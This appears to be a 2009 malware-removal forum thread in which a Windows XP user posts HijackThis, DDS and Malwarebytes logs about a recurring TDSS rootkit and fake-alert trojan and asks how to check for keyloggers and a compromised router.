C:\WINDOWS\system32\ctfmon.exe C:\Program Files\HACE\Mmm\Mmm.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing) O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing) O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing) O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing) O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe O4 - HKLM\..\Run: [TFNF5] TFNF5.exe O4 - HKLM\..\Run: [TPSMain] TPSMain.exe O4 - HKLM\..\Run: [TFncKy] TFncKy.exe O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe" O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe" O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ? O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265 O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing) O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe -- End of file - 8503 bytes I haven't run a new test with DDS.scr. Did you want me to do that? I never did see the optional test request come up the first time. I have recently deleted all past System Restore points, to kill any viruses hidden away. However, while my system now appears to be clean, according to MBAM, I am still seeing (and hearing) that suspect hard drive access every ten seconds. I am still none the wiser as to what is causing it. I'm pretty sure it wasn't doing it before the infection. I don't think it is AVG 8.5 as I tried disabling it and it made no difference. Also, Process Explorer lists AVG's processes separately to what seems to be accessing the disk. Windows Task Manager doesn't show anything that gives any idea. Could there be anything nasty left in the system that is checking what I am doing? What about keyloggers for instance? Also, how can I tell if my router has been hacked, infected or compromised? Are there any tests I can run or are there things to look out for? I'd like to find out why the DSL light on it seems more busy than usual since my PC got infected. I'm still bothered by the post I read on this site saying that a router can have its firmware updated with a rogue version, let alone things like having the DNS changed. That sounds like something that can't be fixed, even if you reset the router to factory settings. Please could you advise me on any ways to check my router? Thanks again.

Ok, I have just run DDS.scr. I didn't get any request to run an Optional Scan. I'm not sure why. I simply double-clicked on the program, a DOS box appeared and it said a three minute test would be done. I then received the two text files. Did I need to do anything else to get the optional scan? Also, the results told me only to copy and paste DDS.txt but not to do the same with Attach.txt. Instead it told me to Zip the file and attach it, which I have done. Here is DDS.txt. I temporarily disabled AVG while running DDS, which you can see listed: DDS (Ver_09-07-30.01) - NTFSx86 Run by user at 12:16:14.93 on 10/09/2009 Internet Explorer: 7.0.5730.11 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.475 [GMT 1:00] AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF} ============== Running Processes =============== C:\WINDOWS\system32\svchost -k DcomLaunch svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs svchost.exe svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe -k HTTPFilter C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\WINDOWS\system32\TPSBattM.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\Program Files\NoAds\NoAds.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\HACE\Mmm\Mmm.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\Program Files\Internet Explorer\iexplore.exe C:\Documents and Settings\user\Desktop\dds.scr ============== Pseudo HJT Report =============== uStart Page = hxxp://home.live.com/ uSearch Page = hxxp://www.google.com uSearch Bar = hxxp://www.google.com/ie uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8 uInternet Settings,ProxyOverride = <local> uSearchAssistant = hxxp://www.google.com/ie uSearchURL,(Default) = hxxp://www.google.com/search?q=%s mSearchAssistant = hxxp://www.google.com/ie BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\adobe\acrobat 7.0\activex\AcroIEHelper.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program files\avg\avg8\avgssie.dll BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\progra~1\spybot~1\SDHelper.dll BHO: SSVHelper Class: {761497bb-d6f0-462c-b6eb-d4daf1d92d43} - c:\program files\java\jre1.6.0_07\bin\ssv.dll BHO: Google Toolbar Helper: {aa58ed58-01dd-4d91-8333-cf10577473f7} - c:\program files\google\googletoolbar2.dll BHO: Google Toolbar Notifier BHO: {af69de43-7d58-4638-b6fa-ce66b5ad205d} - c:\program files\google\googletoolbarnotifier\3.0.1225.9868\swg.dll TB: &Google: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:\program files\google\googletoolbar2.dll TB: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - EB: {4528BBE0-4E08-11D5-AD55-00010333D0AD} - No File EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File uRun: [NoAds] "c:\program files\noads\NoAds.exe" uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe uRun: [Mmm] "c:\program files\hace\mmm\Mmm.exe" uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe mRun: [igfxTray] c:\windows\system32\igfxtray.exe mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe mRun: [00THotkey] c:\windows\system32\00THotkey.exe mRun: [000StTHK] 000StTHK.exe mRun: [LTSMMSG] LTSMMSG.exe mRun: [Apoint] c:\program files\apoint2k\Apoint.exe mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe mRun: [TFNF5] TFNF5.exe mRun: [TPSMain] TPSMain.exe mRun: [TFncKy] TFncKy.exe mRun: [NeroCheck] c:\windows\system32\NeroCheck.exe mRun: [AVG8_TRAY] c:\progra~1\avg\avg8\avgtray.exe mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE mRunOnce: [Malwarebytes Anti-Malware (reboot)] "c:\program files\malwarebytes' anti-malware\mbam.exe" /runcleanupscript StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adober~1.lnk - c:\program files\adobe\acrobat 7.0\reader\reader_sl.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~2.lnk - c:\program files\common files\microsoft shared\works shared\wkcalrem.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\startg~1.lnk - c:\program files\getright\GetRight.exe IE: Download with GetRight - c:\program files\getright\GRdownload.htm IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC} - c:\program files\java\jre1.6.0_07\bin\ssv.dll IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\progra~1\spybot~1\SDHelper.dll DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} - hxxp://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - hxxp://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1238014490265 DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jdk/6u7/jinstall-6u7-windows-i586-jc.cab?e=1222427383613&h=b8ac855f339f32209a0ec00ff741fe50/&filename=jinstall-6u7-windows-i586-jc.cab DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} - hxxp://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} - hxxp://crucial.com/controls/cpcScanner.cab DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab DPF: {D821DC4A-0814-435E-9820-661C543A4679} - hxxp://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg8\avgpp.dll Notify: avgrsstarter - avgrsstx.dll Notify: igfxcui - igfxsrvc.dll Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll ============= SERVICES / DRIVERS =============== R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2008-6-19 335240] R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86;c:\windows\system32\drivers\avgmfx86.sys [2008-6-19 27784] R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [2008-5-24 53760] R2 avg8wd;AVG8 WatchDog;c:\progra~1\avg\avg8\avgwdsvc.exe [2009-2-2 297752] S3 gkmixern;gkmixern;c:\docume~1\user\locals~1\temp\gkmixern.sys [2003-3-6 15872] S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\drivers\smcwgu.sys --> c:\windows\system32\drivers\SMCWGU.sys [?] =============== Created Last 30 ================ 2009-09-03 04:25 <DIR> --d----- c:\docume~1\user\applic~1\Malwarebytes 2009-09-03 04:25 38,160 a------- c:\windows\system32\drivers\mbamswissarmy.sys 2009-09-03 04:25 19,096 a------- c:\windows\system32\drivers\mbam.sys 2009-09-03 04:25 <DIR> --d----- c:\program files\Malwarebytes' Anti-Malware 2009-09-03 04:25 <DIR> --d----- c:\docume~1\alluse~1\applic~1\Malwarebytes 2009-08-31 22:37 <DIR> --d----- c:\program files\Trend Micro 2009-08-21 11:05 1,717,410 a------- C:\00.bmp 2009-08-14 18:51 <DIR> --d----- c:\windows\system32\wbem\Repository ==================== Find3M ==================== 2009-08-24 03:17 123 a------- C:\drmHeader.bin 2009-08-21 06:10 335,240 a------- c:\windows\system32\drivers\avgldx86.sys 2009-08-21 06:10 11,952 a------- c:\windows\system32\avgrsstx.dll 2008-05-14 18:56 32,768 a--sh--- c:\windows\system32\config\systemprofile\local settings\history\history.ie5\mshist012008051420080515\index.dat 2008-03-27 14:15 49,152 a--sh--- c:\windows\temp\temporary internet files\content.ie5\index.dat ============= FINISH: 12:17:21.40 =============== I had a look at Attach.txt and thought I better clarify a few of the Save/Restore points. RP574, RP577, RP580, RP595 and RP605 are just Save points I made myself. RP610, which is entitled "wrong" is the Save point I made shortly after the virus attack. This one I made to see if System Restore was working. I know not to ever use this as a Restore point because the viruses are in the system at that time. I will need to delete that Save point (and any after it). All points after that indicate where I was starting to remove programs due to the attack. Finally, I have run Process Explorer again to see what might be accessing C: drive every 10 seconds. All it says is that "System" is doing I/O Delta Writes of 6, I/O Delta Write Bytes of 13.5KB and I/O Delta Other of 8. I really don't know what that means. I know you didn't list this program as part of your tests but I get this same reading everytime and no specific System process is listed for those readings. Regards. Attach.zip

Thank you for your response. I am writing any personal text in bold so you can see it more clearly amongst all the logs. Here is my first MBAM log. I switched off Word Wrap in Notepad because I read somewhere that it messes up the display of the logs: Malwarebytes' Anti-Malware 1.40 Database version: 2734 Windows 5.1.2600 Service Pack 3 03/09/2009 06:01:26 mbam-log-2009-09-03 (06-01-26).txt Scan type: Full Scan (C:\|) Objects scanned: 177140 Time elapsed: 1 hour(s), 25 minute(s), 32 second(s) Memory Processes Infected: 0 Memory Modules Infected: 0 Registry Keys Infected: 8 Registry Values Infected: 1 Registry Data Items Infected: 6 Folders Infected: 1 Files Infected: 13 Memory Processes Infected: (No malicious items detected) Memory Modules Infected: (No malicious items detected) Registry Keys Infected: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{3aa42713-5c1e-48e2-b432-d8bf420dd31d} (Rogue.AntiVirus2008) -> Quarantined and deleted successfully. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{e596df5f-4239-4d40-8367-ebadf0165917} (Rogue.Installer) -> Quarantined and deleted successfully. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{b64f4a7c-97c9-11da-8bde-f66bad1e3f3a} (Rogue.WinAntiVirus) -> Quarantined and deleted successfully. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{1a26f07f-0d60-4835-91cf-1e1766a0ec56} (Trojan.Agent) -> Quarantined and deleted successfully. HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{19127ad2-394b-70f5-c650-b97867baa1f7} (Backdoor.Bot) -> Quarantined and deleted successfully. HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{43bf8cd1-c5d5-2230-7bb2-98f22c2b7dc6} (Backdoor.Bot) -> Quarantined and deleted successfully. HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{19127ad2-394b-70f5-c650-b97867baa1f7} (Backdoor.Bot) -> Quarantined and deleted successfully. HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{43bf8cd1-c5d5-2230-7bb2-98f22c2b7dc6} (Backdoor.Bot) -> Quarantined and deleted successfully. Registry Values Infected: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\UID (Malware.Trace) -> Quarantined and deleted successfully. Registry Data Items Infected: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Trojan.FakeAlert) -> Data: c:\windows\system32\sdra64.exe -> Delete on reboot. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Trojan.FakeAlert) -> Data: system32\sdra64.exe -> Delete on reboot. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully. HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel\Homepage (Hijack.Homepage) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Hijack.Userinit) -> Bad: (C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) Good: (Userinit.exe) -> Quarantined and deleted successfully. Folders Infected: C:\WINDOWS\system32\lowsec (Stolen.data) -> Delete on reboot. Files Infected: C:\WINDOWS\system32\kbiwkmqhoowqev.dll (Rootkit.TDSS) -> Delete on reboot. C:\WINDOWS\system32\kbiwkmtmawnylv.dll (Rootkit.TDSS) -> Delete on reboot. C:\WINDOWS\system32\drivers\kbiwkmmpkbneti.sys (Rootkit.TDSS) -> Delete on reboot. C:\WINDOWS\system32\lowsec\local.ds (Stolen.data) -> Delete on reboot. C:\WINDOWS\system32\lowsec\user.ds (Stolen.data) -> Delete on reboot. C:\WINDOWS\system32\lowsec\user.ds.lll (Stolen.data) -> Delete on reboot. C:\Documents and Settings\user\Application Data\wiaserva.log (Malware.Trace) -> Quarantined and deleted successfully. C:\WINDOWS\system32\sdra64.exe (Trojan.FakeAlert) -> Delete on reboot. C:\WINDOWS\system32\kbiwkmdjogxnby.dat (Rootkit.TDSS) -> Delete on reboot. C:\WINDOWS\system32\kbiwkmrcsxevbr.dat (Rootkit.TDSS) -> Delete on reboot. Here is the most recent log. Please note that I ran a test the following day after the initial scan, plus each day after. They are practically identical in their results to the latest scan. The rootkit gets detected and removed but returns the next day: Malwarebytes' Anti-Malware 1.40 Database version: 2770 Windows 5.1.2600 Service Pack 3 10/09/2009 09:46:30 mbam-log-2009-09-10 (09-46-30).txt Scan type: Quick Scan Objects scanned: 102362 Time elapsed: 17 minute(s), 5 second(s) Memory Processes Infected: 0 Memory Modules Infected: 0 Registry Keys Infected: 1 Registry Values Infected: 0 Registry Data Items Infected: 0 Folders Infected: 0 Files Infected: 0 Memory Processes Infected: (No malicious items detected) Memory Modules Infected: (No malicious items detected) Registry Keys Infected: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\kbiwkmewcpaswe (Rootkit.TDSS) -> Quarantined and deleted successfully. Registry Values Infected: (No malicious items detected) Registry Data Items Infected: (No malicious items detected) Folders Infected: (No malicious items detected) Files Infected: (No malicious items detected) Here is my HijackThis log that I have just run: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 11:32:55, on 10/09/2009 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16791) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\WINDOWS\system32\TPSBattM.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\Program Files\NoAds\NoAds.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\HACE\Mmm\Mmm.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing) O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - 